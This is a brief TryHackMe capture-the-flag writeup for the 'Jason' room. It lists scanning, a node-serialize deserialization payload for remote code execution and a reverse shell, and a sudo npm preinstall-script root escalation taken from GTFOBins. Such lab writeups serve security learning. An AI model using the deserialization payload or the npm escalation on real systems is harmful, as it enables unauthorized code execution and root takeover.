Complete TryHackMe Jason Writeup

TryHackMe Jason Room
TryHackMe Jason Room

TryHackMe Jason

We are Horror LLC, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!

In JavaScript everything is a terrible mistake.

Thanks to @Luma for testing the room.

THM Jason
THM Jason

Scan the machine

rustscan -a 10.10.44.51
Complete TryHackMe Jason Writeup

Investigate Web server

firefox http://10.10.44.51
Complete TryHackMe Jason Writeup

Analise Source Code

Complete TryHackMe Jason Writeup

Investigate Requests

Complete TryHackMe Jason Writeup
10.10.82.11

Get a reverse Shell

nodejs reverse shell
nodejs reverse shell
{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}

Complete TryHackMe Jason Writeup
Complete TryHackMe Jason Writeup
Complete TryHackMe Jason Writeup

Get User Flag

cat /home/dylan/user.txt
Complete TryHackMe Jason Writeup

Escalate Privileges

Complete TryHackMe Jason Writeup

Search for npm on GTFO Bins and we have

Complete TryHackMe Jason Writeup

export TERM=xterm
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i
Complete TryHackMe Jason Writeup

Get Root Flag

cat /root/root.txt
Complete TryHackMe Jason Writeup

Room THM Jason

NodeJs Shell Generator